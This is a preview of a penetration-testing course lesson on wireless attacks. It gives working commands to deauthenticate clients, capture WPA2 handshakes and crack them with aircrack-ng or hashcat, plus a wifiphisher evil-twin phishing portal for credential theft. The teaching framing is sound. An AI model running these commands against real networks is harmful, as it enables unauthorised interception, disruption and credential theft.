You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
Not all attacks are digital. Wireless attacks target the radio-frequency layer, while social engineering exploits human psychology. Both are powerful attack vectors and are commonly included in comprehensive penetration testing engagements — always with explicit authorisation.
Legal note: Intercepting wireless communications and conducting social engineering attacks without authorisation is illegal. These techniques require specific scope approval in the rules of engagement.
| Standard | Security Level | Status | Key Features |
|---|---|---|---|
| WEP | Very weak | Deprecated | Static keys, easily cracked |
| WPA | Weak | Deprecated | TKIP, still vulnerable |
| WPA2 | Moderate | Still common | AES/CCMP, vulnerable to KRACK |
| WPA3 | Strong | Current standard | SAE handshake, forward secrecy |
# Check if your adapter supports monitor mode
iwconfig
airmon-ng
# Enable monitor mode
sudo airmon-ng start wlan0
# Verify monitor mode
iwconfig wlan0mon
# Scan for nearby networks
sudo airodump-ng wlan0mon
# Target a specific network (capture handshake)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
BSSID PWR CH ENC AUTH ESSID
AA:BB:CC:DD:EE:FF -45 6 WPA2 PSK TargetNetwork
11:22:33:44:55:66 -60 11 WPA2 PSK OtherNetwork
BSSID = Access point MAC address
PWR = Signal strength (higher = closer)
CH = Channel
ENC = Encryption type
AUTH = Authentication type
ESSID = Network name
# Step 1: Capture the 4-way handshake
# Wait for a client to connect, OR force a deauthentication
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# -0 5 = send 5 deauth frames
# -a = target AP BSSID
# -c = target client MAC
# Step 2: Once "WPA handshake: AA:BB:CC:DD:EE:FF" appears in airodump-ng
# Step 3: Crack with aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Step 4: Or convert to hashcat format for GPU cracking
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
An evil twin is a rogue access point that impersonates a legitimate network:
Legitimate AP Evil Twin AP
┌──────────────┐ ┌──────────────┐
│ "FreeWiFi" │ │ "FreeWiFi" │
│ (real) │ │ (attacker) │
└──────┬───────┘ └──────┬───────┘
│ │
│ Victim device │
│ connects to stronger ────────┘
│ signal (attacker)
# Using hostapd-mana or wifiphisher
# 1. Create a rogue AP matching the target SSID
# 2. Optionally serve a captive portal to capture credentials
# 3. Forward traffic (MitM) or harvest data
# Example with wifiphisher
sudo wifiphisher -i wlan0 --essid "Company_WiFi" -p firmware-upgrade
Ethical note: Evil twin attacks must be explicitly authorised and are typically performed in a controlled environment.
Social engineering attacks exploit human behaviour rather than technical vulnerabilities.
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.